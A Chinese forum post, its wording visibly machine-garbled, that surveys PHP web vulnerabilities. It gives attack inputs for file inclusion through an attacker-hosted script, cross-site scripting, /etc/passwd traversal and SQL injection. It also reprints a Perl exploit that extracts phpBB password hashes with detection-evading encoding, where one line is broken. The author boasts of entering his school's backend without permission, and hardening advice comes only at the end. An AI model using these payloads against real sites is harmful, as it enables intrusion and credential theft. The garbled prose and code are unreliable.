|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
学会了生成静态网页,现在你应该接触一下XML了,恩,XML也了解了,那么AJAX你也得接触接触吧?AJAX完了....然后... 从如今的收集平安来看,人人最存眷和接触最多的WEB页面破绽应当是ASP了,在这方面,小竹是专家,我没讲话权.但是在PHP方面来看,也一样存在很严重的平安成绩,然而这方面的文章却不多.在这里,就跟人人来略微的会商一下PHP页面的相干破绽吧.
我对今朝罕见的PHP破绽做了一下总结,大致分为以下几种:包括文件破绽,剧本号令履行破绽,文件泄漏破绽,SQL注入破绽等几种.固然,至于COOKIE棍骗等一局部通用的手艺就不在这里会商了,这些材料网上也良多.那末,咱们就一个一个来剖析一下如何使用这些破绽吧!
起首,咱们来会商包括文件破绽.这个破绽应当说是PHP独有的吧.这是因为不充实处置内部供应的歹意数据,从而招致近程进击者可以使用这些破绽以WEB历程权限在体系上履行恣意号令.咱们来看一个例子:假定在a.php中有如许一句代码:
<?php
include($include."/xxx.php");
?>
在这段代码中,$include通常为一个已设置好的途径,然而咱们可以经由过程本人机关一个途径来到达进击的目标.例如说咱们提交:a.php?include=http://web/b.php,这个web是咱们用做进击的空间,固然,b.php也就是咱们用来进击的代码了.咱们可以在b.php中写入相似于:passthru("/bin/ls /etc");的代码.如许,就能够履行一些有目标的进击了.(注:web办事器应当不克不及履行php代码,否则就出成绩了.相干概况可以去看<<若何对PHP法式中的罕见破绽停止进击>>).在这个破绽方面,出情况的良多,例如说:PayPal Store Front,
HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.
接着,咱们再来看一下剧本号令履行破绽.这是因为对用户提交的URI参数短少充实过滤,提交包括歹意HTML代码的数据,可招致触发跨站剧本进击,能够取得方针用户的敏感信息。咱们也举个例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面临PHPSESSID短少充实的过滤,咱们可以经由过程如许的代码来到达进击的目标:
http://web/index.php?PHPSESSID="><script>...</script>在script外面咱们可以机关函数来取得用户的一些敏感信息.在这个破绽方面绝对要少一点,除PHP Transparent以外还有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.
再然后,咱们就来看看文件泄漏破绽了.这类破绽是因为对用户提交参数短少充实过滤,近程进击者可以使用它停止目次遍历进击和获得一些敏感信息。咱们拿比来发明的phpMyAdmin来做例子.在phpMyAdmin中,export.php页面没有对用户提交的'what'参数停止充实过滤,近程进击者提交包括多个'../'字符的数据,即可绕过WEB ROOT限制,以WEB权限检查体系上的恣意文件信息。例如说打入如许一个地址:export.php?what=../../../../../../etc/passwd%00 就能够到达文件泄漏的目标了.在这方面绝对多一点,有:myPHPNuke,McNews等等.
最初,咱们又要回到最高兴的中央了.想一想咱们平常在asp页面顶用SQL注入有何等爽,之前还要手动注入,一向到小竹悟出"SQL注入密笈"(嘿嘿),然后再开做出NBSI今后,咱们NB同盟真是拉出一片天空.曾前后帮CSDN,豪富翁服装论坛,中国频道等大型网站找露马脚.(这些空话不多说了,有点跑题了...).仍是言规正传,其其实asp中SQL的注入和php中的SQL注入大致不异,只不外略微注重一下用的几个函数就行了.将asc改成ASCII,len改成LENGTH,其他函数根基不变了.其实人人看到PHP的SQL注入,是否是城市想到PHP-NUKE和PHPBB呢?不错,俗语说树大招分,像动网如许的服装论坛在asp界就该是破绽这王了,这并非说它的服装论坛平安太差,而是名望太响,他人用的多了,研讨的人也就多了,发明的平安破绽也就越多了.PHPBB也是一样的,如今很大一局部人用PHP做服装论坛的话,普通都是选择了PHPBB.它的破绽也是一向在出,从最早phpBB.com phpBB 1.4.0版本被人发明破绽,到如今比来的phpBB 2.0.6版本的groupcp.php,和之前发明的search.php,profile.php,viewtopic.php等等加起来,也许也有十来个模样吧.这也一向招致,一局部人在研讨php破绽的时分城市拿它做实行品,所谓百练成精嘛,信任今后的PHPBB会愈来愈好.
好了,咱们仍是来剖析一下破绽发生的缘由吧.拿viewtopic.php页面来讲,因为在挪用viewtopic.php时,直接从GET恳求中取得"topic_id"并传递给SQL查询号令,而并没有停止一些过滤的处置,进击者可以提交特别的SQL字符串用于取得MD5暗码,取得此暗码信息可以用于主动登录或停止暴力破解。(我想应当不会有人想去暴力破解吧,除非有出格主要的缘由).先看一下相干源代码:
# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
# {
# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
# }
# else if ( isset($HTTP_GET_VARS['topic']) )
# {
# $topic_id = intval($HTTP_GET_VARS['topic']);
# }
从下面咱们可以看出,假如提交的view=newest而且sid设置了值的话,履行的查询代码像上面的这个模样(假如你还没看过PHPBB源代码的话,建议你看了再对着这里来看,受影响体系为:phpBB 2.0.5和phpBB 2.0.4).
# $sql = "SELECT p.post_id
# FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
# WHERE s.session_id = '$session_id'
# AND u.user_id = s.session_user_id
# AND p.topic_id = $topic_id
# AND p.post_time >= u.user_lastvisit
# ORDER BY p.post_time ASC
# LIMIT 1";
Rick供应了上面的这断测试代码:
use IO::Socket;
$remote = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid = shift || 2;
$port = 80;
$dbtype = 'mysql4'; # mysql4 or pgsql
print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";
$p = "";
for($index=1; $index<=32; $index++)
{
$socket = IO::Socket::INET->new(PeerAddr => $remote,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "Couldnt connect to $remote:$port : $@\n";
$str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0\n\n";
print $socket $str;
print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it
print $socket "Host: $remote\n\n";
while ($answer = <$socket>)
{
if ($answer =~ /location:.*\x23(\d+)/) # Matches the location: viewtopic.php?p=<num>#<num>
{
$p .= chr ();
}
}
close($socket);
}
print "\nMD5 Hash for uid $uid is $p\n";
# random encode str. helps avoid detection
sub random_encode
{
$str = shift;
$ret = "";
for($i=0; $i<length($str); $i++)
{
$c = substr($str,$i,1);
$j = rand length($str) * 1000;
if (int($j) % 2 || $c eq ' ')
{
$ret .= "%" . sprintf("%x",ord($c));
}
else
{
$ret .= $c;
}
}
return $ret;
}
sub make_dbsql
{
if ($dbtype eq 'mysql4')
{
return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
} elsif ($dbtype eq 'pgsql')
{
return "; select ascii(substring(user_password from $index for 1)) as post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
}
else
{
return "";
}
}
这断代码,我就不多做注释了.感化是取得HASH值.
看到这里,人人能够有点疑问,为何我后面讲的那些改的函数怎样没有效到,我讲出来不怕人人笑话:其实网上良多站点有些页面的查询语句看起来会是如许:
display.php?sqlsave=select+*+from+aaa+where+xx=yy+order+by+bbb+desc
不要笑,这是真的,我还靠这个进过几个大型网站.至于哪一些,欠好讲出来,不外咱们黉舍的网站,我就是靠这个进后台的(但愿黉舍收集中间的看不到这篇文章,^_^).把后面那函数用上吧.否则你只要改人家的暗码了哦!!!
差点忘了一点,在SQL注入的时分,PHP与ASP有所分歧,mysql对sql语句的应用没有mssql天真,因而,良多在mssql上可以用的查询语句在mysql数据库中都不克不及见效了. 普通咱们罕见的注入语句像如许:aaa.php?id=a' into outfile 'pass.txt或是aaa.php?id=a' into outfile 'pass.txt' /*再进一步可以改成:aaa.php?id=a' or 1=1 union select id,name,password form users into outfile 'c:/a.txt
如许可以将数据库数据导出为文件,然后可以检查.
或是如许:mode=',user_level='4
这个语句普通用在修正材料时,假定页面存在破绽的话,就能够到达提拔权限的做用.
其它的如' OR 1=1 -- 或:1' or 1='1则跟asp差不多.这里不多讲了.在php外面,SQL注入看来仍是破绽之首啊,有太多的页面存在这个成绩了.
其实人人可以看出来,下面那些分类归根结柢只要一个缘由:提交参数没过滤或是过滤不敷严谨.黑客防地历来有攻有守.这里,就大致讲一下提防的办法吧.
起首,我团体以为最主要的一点是将magic_quotes_gpc高为ON,它的感化是将单引号,双引号,反斜线,和空字符转换为含有反斜线的字符,如select * from admin where username='$username' and password='$password'语句,进击者想用1' or 1='1跳过验证,然而,那些字符串将被转换成如许:select * from admin where username='a' and password='1\' or 1=\'1'从而到达禁止注入的目标,现实也就是主动停止了addslashes()操作.再不可的话,本人界说函数处置吧.如今看来,那些弄PHP注入的人也对照愁闷,由于myslq4以下版本不撑持子语句,而新版本的mysql又会将magic_quotes_gpc选项默许为开.
处理包括文件破绽用的办法就是:请求法式员包括文件里的参数尽可能不要利用变量,假如利用变量,就必定要严厉反省要包括的文件名,相对不克不及由用户恣意指定,建议设global_variables为off。如后面文件翻开中限制PHP操作途径是一个需要的选项。别的,如非特别需求,必定要封闭PHP的近程文件翻开功效。修正php.ini文件:allow_url_fopen = Off(注:拜见<<PHP平安成绩:近程溢出、DoS、safe_mode绕过破绽>>).
还有一点我感觉良多网站城市有这个成绩,就是没有关毛病显示.轻一看能够没甚么,然而一些盯了好久(用词有点不合错误哦)的人就能够经由过程毛病提醒来取得如数据库信息,网页文件物理途径等等。学习数据库了,MYSQL可算是PHP的黄金搭档了,不过,虽然话是这么说,你也可能恨不得把MYSQL给生吞活剥了,因为这一行一列的东东简直让自己头晕目眩。 |
|